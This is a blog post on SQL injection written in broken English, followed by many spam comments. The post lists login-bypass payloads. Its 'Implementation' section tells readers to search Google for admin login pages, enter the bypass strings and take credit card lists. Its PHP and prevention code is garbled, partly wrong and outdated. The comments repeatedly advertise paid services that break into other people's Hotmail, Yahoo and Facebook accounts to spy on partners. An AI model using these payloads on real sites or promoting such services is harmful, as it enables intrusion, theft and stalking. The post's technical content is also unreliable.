SQL INJECTION DANGEROUS BUG
SQL injection is a exploit type in which the attacker adds SQL (Structured Query Language) code to a Web form input box or web address for gaining access to server database. SQL injection comes when the attacker can insert some SQL statement to the 'query' with the data input manipulation to application page.
SQL Injection can be used when the input box has no character filter such as quotes character and double minus character. Hakcer can insert a SQL commands into a parameter and a form.
SQL Injection dangerous
1) This technique allows someone can log into the system without having any account.
2) SQL injection also allows hacker to delete, or add the some database record. This cause miss server function.
To perform SQL Injection, just needs a browser, Personal computer with internet connection and a kernel mode debugger software such as softice
SQL Injection Syntax with PHP :
1) $ SQL = "select * from login where username = '$ username' and password = '$ password'", (from GET or POST variable)
2) Input the string with the password 'or''='
3) Then the SQL result = "select * from login where username = '$ username' and password = 'pass' or'='";, (with this selection, the results will always be TRUE)
4) then we can inject SQL Syntax (in this case OR) to SQL
SQL Injection Syntax :
1) SQL string syntax '-- after the username
2) Database Query initial:
Select * from user where name = 'bob' and password = 'robot'
Changed to:
select * from user where name = 'bob'--'and password ='xxx'
Example : SQL Injection Syntax :
SQL Injection via the URL, for example:
http://10.344.102.233/web1/index.php?option=product.php&status=1; update cost order set ordered where = 50 = 9;
To prevent SQL Injection :
1) Changing the script php
2) Using MySQL_escape_string
3) Filtering Characters' and modify the php.ini
1. To modify PHP script :
Example of the php script:
$ query = "select id, name, email, password, type, a block from the user."
"where email = '$ Email' and password = '$ password'";
$ result = mySQL_query ($ query, $ id_mySQL);
while ($ row = mysql_fetch_row ($ result))
(
$ Id = $ row [0];
$ name = $ row [1];
$ email = $ row [2];
$ password = $ row [3];
$ type = $ row [4];
$ block = $ row [5];
)
if (strcmp ($ block, 'yes') == 0)
(
echo " \ n ";
exit ();
)
else if (! empty ($ Id) & &! empty ($ name) & &! empty ($ email) & &! empty ($ password));
The script above allows someone to log in with SQL commands into a login form. When the hacker insert character 'or''=' into the email Account form then cause query as below:
select idname, email, password, type, a block from where the user email = "or" = "and password =" or "="
So, change the script as below:
$ query = "select id, name, email, password, type, a block from the user."
"where email = '$ Email'";
$ result = mySQL_query ($ query, $ id_mySQL);
while ($ row = mysql_fetch_row ($ result))
(
$ Id = $ row [0];
$ name = $ row [1];
$ email = $ row [2];
$ password = $ row [3];
$ type = $ row [4];
$ block = $ row [5];
)
if (strcmp ($ block, 'yes') == 0)
(
echo " \ n ";
exit ();
)
$ pass = md5 ($ password);
else if ((strcmp ($ Email, $ email) == 0) & & strcmp ($ pass, $ password) == 0));
2. Using MySQL_escape_string
Change the character string that contains ' tobe \ '. Example: injec'tion become injec\' tion. Example:
$ map = "SQL injec'tion";
$ filter = mySQL_escape_string ($ chart);
echo "Result filter: $ filter";
3. Filtering characters' and modify the php.ini
Modify the the php.ini variables with magic_quotes enable. This causes PHP turn the string and characters' into \ 'automatically
Script Example for filtering input:
function validatepassword (input)
good_password_chars =
"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
validatepassword = true
for i = 1 to len (input)
c = mid (input, i, 1)
if (InStr (good_password_chars, c) = 0) then
validatepassword = false
exit function
end if
next
end function
SQL Injection Implementation
1) Go to Google or the other browsers :
2) Enter a keyword below :
"/ admin.asp"
"/ login.asp"
"/ logon.asp"
"/ adminlogin.asp"
"/ adminlogon.asp"
"/ admin_login.asp"
"/ admin_logon.asp"
"/ admin / admin.asp"
"/ admin / login.asp"
"/ admin / logon.asp"
(you can add your own suit)
3) Open up one of the links found by google, it's likely you will see a login page (user name and password).
4) Enter the following code:
User name: `or` a '=' a
Password: `or` a '=' a
5) If You are lucky, you will get the admin panel, where you can add or delete record as you want. And others, you can get a list of the many credit card.
6) If it does not work, try searching for the other links found by Google.
7) Many code variations that can bi used, among others:
User name: admin
Password: `or` a '=' a
or :
'Or 0 = 0 -; "or 0 = 0 -, or 0 = 0 -' or 0 = 0 #;
"Or 0 = 0 # 'or'x' = 'x;" or "x" = "x') or ( 'x' = 'x
Other method to prevent SQL INJECTION :
1) Limit the input box length
2) Filter input
3) Turn off or hide error messages
4) Turn off the standard facilities such as Stored Procedures, Extended Stored Procedures
5) Change "Startup and run SQL Server" using low privileged users in the SQL Server Security tab.
Source :
securiteam
greensql
ferruh.mavituna
32 comments
A really way to hack hotmail passwords! This service is absolutely 100% no bullsh*! They really do what they say they will do and they do it quick. My advice to anyone who uses this service, however, is to really take some time to think about if you really want to go digging; because when you go digging what you will usually find, as they say, is dirt. I personally feel very liberated having found out what I did, but i also had sort of prepared myself for it beforehand and had a gut feeling already. I needed absolute proof, though, and I got it. Be careful what you wish for because if its getting into your ex's email, http://www.ActiveHackers.com will grant your wish.
I don't know what to say... I'm absolutely FLOORED. I hired them to hack into my ex's hotmail email. After about a week I became very skeptical. "OK, this guy's just making fake guestbook entries and collecting cash...". I emailed them asking if this was the case, he kindly responded that he was working on it. Next day, a screenshot. Not a doctored screenshot, because I remember what the inbox looks like and all the folders in it. No, it was real, with real emails from me. I was still skeptical, thinking, "OK, maybe he has some program that can do that, but can it really get passwords, can he hack hotmail email?" I paid, in reality it is not a lot of money in the end. The password even made me skeptical, it was so simple. Certainly it's possible, I've researched it, but could this guy really be who he says he is? But low and behold, it's the real one. I'm shocked from my doubt. This guy Active Hackers is the real thing. I'm still in shock. Thanks man, I can't thank you enough. My heart can breathe a little better, now.
That is what of how to hack a password, hire them http://www.activehackers.com if you want to know how to get into someone's hotmail account. They provide the easy way to hack yahoo and easy way to hack msn messenger. Just to help other people who may need their facebook hacking services.
i like your site & i m intrested in link ex-change if you also do the same plz leave a comment on my site
reddhacking.blogspot.com
Excellent, professional, and very fast service that's crack password facebook. Thank http://www.rayahari.com/how-to-hack-facebook-passwords.php very much . I know the truth now, although it is not as bas as I feared. By knowing the truth, I am hoping to be able to same my marriage since by seeing what is in the inbox, I know that the marriage is worth to be saved. I pray for the peace of all cheated spouses in the whole world... this service is something that faithful spouses can depend on to find the and to find peace.. If you are unsure of facebook password hacking , you can visit www.rayahari.com
BTW, I found another website that can hack yahoo passwords and other one specialized in hack into hotmail passwords.
Diane Calhoun, Lincoln
England
http://www.activehackers.com/ are reliable!
Their service hacking hotmail passwords is incredible!
I was a little antsy waiting for know hacking hotmail passwords but once I got the email that they had gotten in and I saw the proof my heart dropped! Within minutes of making the payment I had the password! This is real, not no gimmick! I highly recommend these guys! I know ppl are always iffy about trusting such a site, but I was desparate and said FUCK IT thank goodness that RayaHari.com is legit!
I thank a bunch, RayaHari is the BEST!!!!!
hack into facebook account - hack into yahoo
where can i find a program to hack yahoo - best free way to hack hotmail password
Paula Robinson, New York
US
Sayimg about Hacking Hotmail Passwords, I'm so glad I found this site hacking hotmail passwords from ActiveHackers.com ! I first suspected my husband was cheating 3 years ago, in fact even my friends thought he was, but I was not willing to confront him in case I was wrong. You from http://www.activehackers.com/ helped me find the proof I needed and, in fact, I've found out even more startling news about him lying to the person he has been having an affair with! Where does it end? I should have never married him. Well, at least my 8 year mistake is now over and I'm moving on. Thank you hacking hotmail passwords
To hack Facebook Passwords, i recommend this site RayaHari.com and this site MilanoRosa.com to hack into Yahoo Passwords and MySpace account
how do i hack into someone yahoo for free - program to hack yahoo accounts-- Emily W, Salem, Oregon
Hi, guys, my husband changed about a year ago, he just seemed to go cold and unloving and I didn't know why. I suspected that he may be having an affair and after hiring http://www.activehackers.com/, I discovered that he was cheating on me with a woman from his work. They had been renting motels and using them during lunch times. I'm not the smartest person in the world but to hacking hotmail passwords, if I can do it using the information hacking hotmail passwords from ActiveHackers.com, anyone can!
crack facebook password - how to hack into yahoo
where can i find a program to hack yahoo - best free way to hack hotmail password
-- Mary T, Glendale, AZ
Do you know hacking hotmail passwords? This was a fantastic service from http://www.activehackers.com/. So fast and they delivered exactly what they promised. I would definitely use them again. Thoroughly recommend. Thank for RayaHari.com extremely professional. Efficient and accurate service. I look forward to using your services again in the very near future. hacking password facebook You Can Do This In Five Minutes.
hack into facebook account - hack into yahoo
where can i find a program to hack yahoo - best free way to hack hotmail password
Paula Robinson, Lincoln
England
I found these people reliable, efficient and not too expensive to hacking hotmail passwords . I found a bunch of places where people offer their services to hacking password facebook. It costs a lot! Has anyone ever used http://www.activehackers.com/ hacking services? They are really professional in hacking email password. I would recommend them. Thank you.
hack into facebook account - hack into yahoo
where can i find a program to hack yahoo - best free way to hack hotmail password
Paula Robinson, Lincoln
England
Amazing http://www.activehackers.com/ !!!! I am surprise how quickly these guys got hacking hotmail passwords for me. I just got the hotmail password hacked in minutes after sending payment through credit card. Very impressed. You did an awesome job and so fast. Highly recommended service of hacking hotmail passwords. GREAT JOB!!
hack into facebook account - hack into yahoo
where can i find a program to hack yahoo - best free way to hack hotmail password
Paula Robinson, Lincoln
England
yahoo hacking password? Dont worry, this rayahari.com does not ask you any information about you. They ask you only to provide nick name when you fill out the request form. They were fast and amazing and you got the information hack into yahoo account that was needed. Thank so much !
http://www.cheapcrack.net/hack-facebook-password.html
BTW, I found another website that can hack yahoo passwords and other one specialized in hack into hotmail passwords.
Diane Calhoun, Lincoln
England
I found these people reliable, efficient and not too expensive to hack into yahoo account . I found a bunch of places where people offer their services to yahoo hacking password. It costs a lot! Has anyone ever used http://www.cheapcrack.net/hack-facebook-password.html hacking services? They are really professional in hacking email password. I would recommend them. Thank you.
BTW, I found another website that can hack yahoo passwords and other one specialized in hack into hotmail passwords.
Diane Calhoun, Lincoln
England
I still cannot believe my eyes about hacking hotmail passwords services from RayaHari.com
http://www.activehackers.com/
I needed my boyfriends hotmail password badly, thanks to RayaHari.com for providing this great hacking hotmail passwords. I found out my bf was cheating on my love for 2years. Service of RayaHari.com was fast, accurate, discreet and fairly priced. Money transfer was secure and made me feel confident about the transacttion. A good , professional outfit for those whe need the service and don't have the time/know-how to do it yourself. I highly recommend this site!
hack into facebook account - hack into yahoo
if you hack yahoo email do they get your ip address - best free way to hack hotmail password
Paula Robinson, New York
US
yahoo password hacking? The services from http://www.cheapcrack.net/hack-facebook-password.html is absolutely works! Don't know how they do it, but who cares?! I had confirmation screen shots sent to me. They use a secure third-party credit card billing company so I feel safe with the transaction. I love this MilanoRosa.com service, specially price is very low to yahoo hacking password. The password they sent works perfectly! Unfortunately I found out my wife is having an affair, but now at least I have a chance to save our marriage. I hired other hacking services to hack into yahoo passwords, I spent alot of money but all in vain. MilanoRosa.com got me the real pasword in less than 2 days. I am very excited now yahoooooooooo...... Knowledge is power! Thanks CheapCrack.net!
BTW, I found another website that can hack yahoo passwords and other one specialized in hack into hotmail passwords.
Diane Calhoun, Lincoln
England
http://www.activehackers.com/ is one of the best email hacking services on internet today. They know hacking facebook password very rapid turn around and also extremely professional. Would certainly recommend the service to friends. Fast work-within 48 hours! I tried another website and it took them over 2 weeks! I would like to say RayaHari.com service is excellent, only after a short period of time I received the password, I would definitely use hacking hotmail passwords in the future, very professional. Thank http://www.activehackers.com/
hack into facebook account - crack yahoo password
where can i find a program to hack yahoo - best free way to hack hotmail password
Paula Robinson, Lincoln
England
http://www.cheapcrack.net/hack-facebook-password.html is one of the best email hacking services on internet today. They know yahoo hacker password very rapid turn around and also extremely professional. Would certainly recommend the service to friends. Fast work-within 48 hours! I tried another website and it took them over 2 weeks! I would like to say MilanoRosa.com service is excellent, only after a short period of time I received the password, I would definitely use yahoo hacking password in the future, very professional. Thank http://www.cheapcrack.net/hack-facebook-password.html
BTW, I found another website that can hack yahoo passwords and other one specialized in hack into hotmail passwords.
Diane Calhoun, Lincoln
England
Hire a Hacker for that....
crack yahoo password All you need to do , is to goto http://www.Rayahari.com . Raya Hari cracks the password for you , for flat $200 USD. http://www.rayahari.com/
Some of the important details are:-
1- They get the original password the victim is using.
2- After getting the password, they provide you with solid proofs.
3- Payment is made ONLY AFTER you are convinced with the proofs they send you.
4- You are required to pay through various methods ,including westernunion , moneygram , paypal , e-gold, moneybookers etc.
5- With enhanced support , solid background and professional lookout , it is by far the best solution to your hacking needs.
6- For more details, just goto www.Rayahari.com hack yahoo profiles
The entire process is completely safe, secure, confidential...and fast. You might get the password within hrs after requesting through http://www.Rayahari.com ...!!
Regards,
Raya Hari
http://www.Rayahari.com
http://www.Rayahari.com
If you are looking for a Genuine, fast, reliable and hack into yahoo account confidential email cracking service then visit
http://www.rayahari.com or http://www.rayahari.com http://www.rayahari.com/
Don't get befooled by the scam making peoples on net. RayaHari is run by well known experts. You may also find our affiliates on site doing well this jobs. We take yours request seriously and execute fastest.
Our charges are nominal that you can pay only after yours job is done and if yahoo hacking password you are satisfied.
Make a request now - goto www.rayahari.com
PS:: We reserve the right to acquire more information if necessary and refuse service if the info you give to us is incorrect.
To contact us, visit the following links only.
WEBSITES:::
http://rayahari.com
http://rayahari.com
Hack Yahoo Password [ http://rayahari.com ]
Hi, guys, my husband changed about a year ago, he just seemed to go cold and unloving and I didn't know why. I suspected that he may be having an affair and after hiring http://www.activehackers.com/, I discovered that he was cheating on me with a woman from his work. They had been renting motels and using them during lunch times. I'm not the smartest person in the world but to hacking hotmail passwords, if I can do it using the information hacking passwords hotmail from ActiveHackers.com, anyone can!
crack facebook password - how to hack into yahoo
where can i find a program to hack yahoo - best free way to hack hotmail password
-- Mary T, Glendale, AZ
Simply http://www.rayahari.com/hack-Facebook-passwords.php is the great service I've ever seen to learn hacking facebook password. I requested 7 passwords to have hack, I got 4 of them in 7 days still waiting for another 3. Service of RayaHari.com is very professional and reliable, got 15% discount for 7 pswds yipeee!! Thanks RayaHari.com Thanks for facebook hacking password :)
BTW, I found another website that can hack yahoo passwords and other one specialized in hack into hotmail passwords.
Diane Calhoun, Lincoln
England
I found these people reliable, efficient and not too expensive to hacking hotmail passwords . I found a bunch of places where people offer their services to hacking hotmail passwords. It costs a lot! Has anyone ever used http://www.activehackers.com/ hacking services? They are really professional in hacking email password. I would recommend them. Thank you.
hack into facebook account - hack into yahoo
where can i find a program to hack yahoo - best free way to hack hotmail password
Paula Robinson, Lincoln
England
hack into yahoo account FIND WHETHER HE REALLY MERITS THE DISTRUST…
You can know EVERYTHING if you know their Email Password.
All you need to do is to goto http://www.activehackers.com . http://www.milanorosa.net/facebook-hacking-tools.php
WHAT’S INSIDE THEIR EMAILS?
WHOM DO THEY EMAIL, OR KEEP IN TOUCH WITH OVER THE INTERNET?
http://www.activehackers.com is used by people worldwide who want to HACK, CRACK someone's Yahoo, Hotmail, Rediffmail, Gmail, AOL or any other email password for an affordable sum of $200 USD flat .
Some of the important details are:-
1- They get the original password the victim is using.
2- After getting the password, they provide you with solid proofs.
3- Payment is made ONLY AFTER you are convinced with the proofs they send you.
4- You are required to pay through various methods ,including westernunion , moneygram , paypal , e-gold, moneybookers etc.
5- With enhanced support , solid background and professional lookout , it is by far the best solution to your hacking needs.
6- For more details, just goto http://www.activehackers.com yahoo hacking password
We GUARANTEE that the entire process is completely safe, secure, confidential...and fast. You will get the password within 36 hrs after requesting through http://activehackers.com ...!!
Regards,
Active Hacker
http://activehackers.com
The Things You Absolutely Must Know To hacking hotmail passwords I tried one of other group www. yourhackerz com but they scammed me $250 USD. They did not reply my even 1 email after leaving me speechless. Thanks god I found http://www.activehackers.com/crack-hotmail-passwords.php to save my marriage. They provide very clear 6 screenshot proofs (2 my own emails) and sent me password after 3 hrs of payment. thanks again http://www.activehackers.com/crack-hotmail-passwords.php will use their hacking facebook password service again in the future.
facebook password hacking - hack into yahoo
where can i find a program to hack yahoo - best free way to hack hotmail password
Paula Robinson, Lincoln
England
Do you want to know hacking passwords hotmail?! Thank this guys ActiveHackers.com http://www.activehackers.com/ for providing such an intelligent and insightful service. I orders last week and followed the instructions to hacking hotmail passwords. It helped me discover concrete evidence of my husband's year long affair with his secretary. I've realized this nightmare marriage was a huge mistake, luckily I'm young and will be all the better for it!
hack facebook profiles - hack yahoo passwords
where can i find a program to hack yahoo - best free way to hack hotmail password
-- Rose P, San Diego, CA
Hi, guys, my husband changed about a year ago, he just seemed to go cold and unloving and I didn't know why. I suspected that he may be having an affair and after hiring http://www.activehackers.com/, I discovered that he was cheating on me with a woman from his work. They had been renting motels and using them during lunch times. I'm not the smartest person in the world but to hacking facebook password, if I can do it using the information how hacking hotmail from ActiveHackers.com, anyone can!
crack facebook password - how to hack into yahoo
where can i find a program to hack yahoo - best free way to hack hotmail password
-- Mary T, Glendale, AZ
Excellent, professional, and very fast service that's hacking hotmail passwords. Thank http://www.activehackers.com/ very much . I know the truth now, although it is not as bas as I feared. By knowing the truth, I am hoping to be able to same my marriage since by seeing what is in the inbox, I know that the marriage is worth to be saved. I pray for the peace of all cheated spouses in the whole world... this service is something that faithful spouses can depend on to find the and to find peace.. If you are unsure of hacking hotmail passwords , you can visit www.rayahari.com
hack into facebook account - hack into yahoo
where can i find a program to hack yahoo - how we hack facebook ids and password
Paula Robinson, Lincoln
England
http://www.rayahari.com/hack-MySpace-passwords.php are reliable!
Their service facebook hacking password is incredible!
I was a little antsy waiting for know hack facebook profiles but once I got the email that they had gotten in and I saw the proof my heart dropped! Within minutes of making the payment I had the password! This is real, not no gimmick! I highly recommend these guys! I know ppl are always iffy about trusting such a site, but I was desparate and said FUCK IT thank goodness that RayaHari.com is legit!
I thank a bunch, RayaHari is the BEST!!!!!
BTW, I found another website that can hack yahoo passwords and other one specialized in hack into hotmail passwords.
Diane Calhoun, New York
US
I found these people reliable, efficient and not too expensive to hacking hotmail passwords . I found a bunch of places where people offer their services to hacking hotmail passwords. It costs a lot! Has anyone ever used http://www.activehackers.com/ hacking services? They are really professional in hacking email password. I would recommend them. Thank you.
hack into facebook account - hack into yahoo
free software that can hack other peoples yahoo messenger account - can we really hack hotmail mail password
Paula Robinson, Lincoln
England
Hire a Hacker for that....
hack into yahoo account All you need to do , is to goto http://www.Rayahari.com . Raya Hari cracks the password for you , for flat $200 USD. http://www.rayahari.com/
Some of the important details are:-
1- They get the original password the victim is using.
2- After getting the password, they provide you with solid proofs.
3- Payment is made ONLY AFTER you are convinced with the proofs they send you.
4- You are required to pay through various methods ,including westernunion , moneygram , paypal , e-gold, moneybookers etc.
5- With enhanced support , solid background and professional lookout , it is by far the best solution to your hacking needs.
6- For more details, just goto www.Rayahari.com yahoo hacking password
The entire process is completely safe, secure, confidential...and fast. You might get the password within hrs after requesting through http://www.Rayahari.com ...!!
Regards,
Raya Hari
http://www.Rayahari.com
http://www.Rayahari.com
Hi Guys, I am just writing to say that you can find help at this site http://www.activehackers.com/ to hacking passwords hotmail. Thank you guys. If it wasnt for you I would probably still be none the wiser that my fiance was cheating on me. And to think we were about to get married! I have no idea what she was thinking or why she was going to marry me, given she was having an affair. Anyway, I ve ended things by hiring ActiveHackers.com to hacking hotmail passwords and there is no way in hell Im ever going have her back. Thanks again - you saved me a massive mistake!
facebook password hacking - hack someones yahoo
how do i hack into someone yahoo for free - program to hack yahoo accounts
-- Josh B, Brunswick, GA
Use Your Computer To yahoo hacking password Find Out The TRUTH About Nearly Anyone!
Are you having trouble in your relationship? Has http://www.rayahari.com/ your spouse's behavior and attitude towards you changed?
You've been told it's all in your yahoo hacking password imagination. Well, is it or isn't it?
Don't you owe it to yourself to get peace of mind and know the truth?
Very good and fast crack facebook password.
http://www.rayahari.com/hack-Facebook-passwords.php thanks for hacking of my girlfriend. It was a pleasure to do business with RayaHari.com. I will come to RayaHari.com again for sure. I am very happy to use this hacking service. Professional and quick. Thank RayaHari.com have proved it again ! If you give the full target info these guys ask for, mind you they will get the password within few days!! I am using this service 3rd time and will use it again to facebook hacking password.
BTW, I found another website that can hack yahoo passwords and other one specialized in hack into hotmail passwords.
Diane Calhoun, New York
US
Infidelity does not discriminate. From hack into yahoo account our professional experience of more than 6 years, we know it affects anyone regardless of race, color or creed. It does not matter whether you are rich or poor, attractive or not, where http://www.rayahari.com/ you live, or what your age.
Infidelity can exist in your home and you can be it's victim!
We understand your pain, frustration and isolation. WHY? Because many of us have been there. We know how yahoo hacking password you can gain back control of your life. You need the TRUTH!
We offer Surveillance services as a way to find out and or Find out what's really going on, the quick and easy way, by providing you the Email Password which your suspect is using...
Post a Comment